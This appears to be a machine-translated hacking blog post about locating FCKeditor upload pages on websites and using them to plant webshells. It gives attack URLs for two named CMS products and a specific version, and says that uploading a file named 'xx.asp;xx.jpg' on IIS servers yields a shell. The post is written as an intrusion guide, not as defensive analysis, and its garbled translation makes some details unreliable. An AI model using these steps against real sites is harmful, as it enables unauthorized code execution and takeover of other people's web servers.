There are many reasons for FCK upload paths

Author: Stream
Powered By WebSite

This CMS uses FCK, but if fckeditor/editor/filemanager/browser/default/browser.html is directly added? Type = Image & Connector = connectors/asp/connector. asp, which is common, can be imported, but cannot be uploaded,

However, when I uploaded the file using FCK in the background, I found that the URL is different from this one. I checked it carefully and changed it myself,

Html? Type = Image & Connector = http % 3A % 2F % 2Fwww.sinosky.com % 2 Ffckeditor % 2 Feditor % 2 Ffilemanager % 2 Fconnectors % 2 Fasp % 2Fconnector. asp "> http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = http % 3A % 2F % 2Fwww.sinosky.com % 2 Ffckeditor % 2 Feditor % 2 Ffilemanager % 2 Fconnectors % 2 Fasp % 2Fconnector. asp

Access, successful,

Generally, the address we test is

Http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = connectors/asp/connector. asp

The location of the webpage file, that is, the relative location. If the Administrator manually moves the folder location, the upload path will be different. Therefore, I will see the result in Figure 1, then, FCK has different versions and versions, and files are stored in different locations. Therefore, the FCK upload path is not unique.

Link 1: The folder location is

Folder location corresponding to link 2

Later, I found that there is another method to call some versions of the upload page, and the file storage path is added later.

Http://xxx.org/admin/editor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = connectors/asp/connector. asp & ServerPath =/UpLoadFiles/

If you do not save the path parameter, you can also see the effect of Figure 1. How many calling methods does FCK upload the page? If you have time, you can take a look at all versions, sort out

Then, how can I get the shell? This is not written. Let's look at the boring blog. It's comprehensive. The boring blog address is linked to the homepage of my blog,

This cmscan directly upload xx.asp;xx.jpg

Summary

1. There are multiple causes for fckupload (browser.html and connector. asp are stored in different versions, which lead to different upload URLs)

(IIS only works)

2. Powered By WebSite Version 1.8

Shell, http://www.xxxx.com/fckeditor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = http % 3A % 2F % 2Fwww.xxxx.com % 2 Ffckeditor % 2 Feditor % 2 Ffilemanager % 2 Fconnectors % 2 Fasp % 2Fconnector. asp directly transmits xx.asp;xx.jpg to get the shell

(IIS only works)

3. Carefree Network website management system cms mx 2008 V1.3.1 enterprise http://www.xxxx.org/admin/editor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = connectors/asp/connector. asp & ServerPath =/UpLoadFiles/

Directly upload xx.asp;xx.jpg to get the shell